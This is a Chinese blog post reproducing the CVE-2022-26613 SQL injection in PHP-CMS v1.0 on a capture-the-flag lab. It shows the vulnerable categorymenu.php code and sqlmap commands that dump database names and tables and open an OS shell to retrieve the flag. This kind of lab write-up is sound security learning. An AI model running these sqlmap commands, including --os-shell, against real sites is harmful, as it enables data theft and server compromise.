首页 > 数据库 >【漏洞复现】PHP-CMS v1.0 SQL注入漏洞(CVE-2022-26613)

【漏洞复现】PHP-CMS v1.0 SQL注入漏洞(CVE-2022-26613)

时间:2023-03-18 16:55:29浏览次数:60  
标签:PHP http v1.0 com 漏洞 CVE CMS php

【漏洞复现】PHP-CMS v1.0 SQL注入漏洞(CVE-2022-26613)


0x01 漏洞描述

春秋云镜靶场:PHP-CMS v1.0存在SQL注入漏洞,攻击者可获得敏感信息。

CVE:PHP-CMS v1.0 was discovered to contain a SQL injection vulnerability via the category parameter in categorymenu.php.

0x02 影响版本

PHP-CMS v1.0

http://pwned_host.com/PHP-CMS-master/categorymenu.php
http://pwned_host.com/PHP-CMS-master/forgot.php
http://pwned_host.com/PHP-CMS-master/post.php 
http://pwned_host.com/PHP-CMS-master/search.php 

0x03 漏洞分析

用户可以在没有任何过滤器的情况下通过GET方法控制参数category。

源码:

<?php
if(isset($_GET['category'])){
    $post_category_id = $_GET['category'];
}
$query = "SELECT * FROM posts WHERE post_category_id = {$post_category_id} ";
$select_all_posts_count_query = mysqli_query($connection,$query);
$count = mysqli_num_rows($select_all_posts_count_query);
confirm_query($select_all_posts_count_query);
……
while($row = mysqli_fetch_assoc($select_all_posts_count_query)){
    $post_id = $row['post_id'];
    $post_title = $row['post_title'];
    $post_user = $row['post_user'];
    $post_date = $row['post_date'];
    $post_image = $row['post_image'];
    $post_content = $row['post_content'];
?>

详细参考:https://github.com/harshitbansal373/PHP-CMS/issues/14

0x04 漏洞复现

进入靶场,界面如下:

点击页面右下角Categories中的#home标签,转入categorymenu.php?category=1页面,单引号测试存在注入点

使用sqlmap爆库名

sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 --dbs

没有发现明显的flag提示,继续测试数据库mysql和cms

sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 -D mysql --tables
sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 -D cms --tables

猜测可能不在数据库中,使用os-shell命令直接从根目录找/flag

sqlmap -u http://eci-2ze94kj4tmvxvn4d1y45.cloudeci1.ichunqiu.com/categorymenu.php?category=1 --os-shell

找到flag


标签:PHP,http,v1.0,com,漏洞,CVE,CMS,php
From: https://www.cnblogs.com/0dot7/p/17229519.html

相关文章

  • 漏洞扫描与安全加固之Apache Axis组件
    一、ApacheAxis组件高危漏洞自查及整改ApacheAxis组件存在由配置不当导致的远程代码执行风险。1.影响版本Axis1和Axis2各版本均受影响2.处置建议1)禁用此服务的远......
  • C代码审计之整数溢出漏洞
    整数溢出就是对整数操作时产生了超过表示范围的数值 溢出:在C中有符号整数溢出是未定义的行为,编译器的做法是回绕或陷阱??回绕:数据表示范围的上界和下界形成一个闭环。上......
  • 【漏洞复现】74cmsSEv3.4.1任意文件读取漏洞(CVE-2022-26271)
    【漏洞复现】74cmsSEv3.4.1任意文件读取漏洞(CVE-2022-26271)0x01漏洞描述春秋云镜靶场:74cmsSEv3.4.1存在任意文件读取漏洞。CVE描述:74cmsSEv3.4.1wasdiscoveredto......
  • 关于CSRF漏洞的一次有趣的交互
    前言在一次项目中,挖掘了一些CSRF漏洞,将细节提交给客户后,发生了一些有趣的交互,这里简单的先把他叫为薛定谔的CSRF,对其深入了解了一下,且听我细细道来。薛定谔的CSRF故事背......
  • C代码审计之缓冲区溢出漏洞及修复方案
    当在某特定数据结构的内存空间的边界之外写入数据时,即会发生缓冲区溢出。 本篇主要针对字符串操作错误引发的漏洞。1、无界字符串复制发生于从源数据复制数据到一个定......
  • Web漏洞-CSRF及SSRF漏洞案例讲解
      CSRF漏洞解释,原理CSRF:跨站请求伪造,是一种网络的攻击方式(核心:伪造请求)黑客利用某网站用户的登陆状态,然后伪造请求的链接,造成对登录态用户的修改等各种危险操作被......
  • Web漏洞-XSS跨站之代码及httponly绕过
    进入后台获得后台权限:cookie权限进入后台;直接账号密码登录Str-replace   关键字过滤什么是httponly如果在cookie中设置了httponly属性,那么通过js脚本将无法读取到co......
  • Nacos身份认证绕过漏洞复现笔记
    0X00漏洞描述Nacos是一个易于使用的平台,专为动态服务发现和配置以及服务管理而设计。可以帮助您轻松构建云原生应用程序和微服务平台。 Nacos身份认证绕过漏洞(QVD-2......
  • SSL/TLS协议信息泄露漏洞(CVE-2016-2183)
    解决办法 工具下载地址NartacSoftware-IISCrypto ......
  • OpenSSH相关漏洞处理(转载)
    原文链接:https://www.lmlphp.com/user/57828/article/item/2348688/OpenSSH(OpenBSDSecureShell)是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。当前低......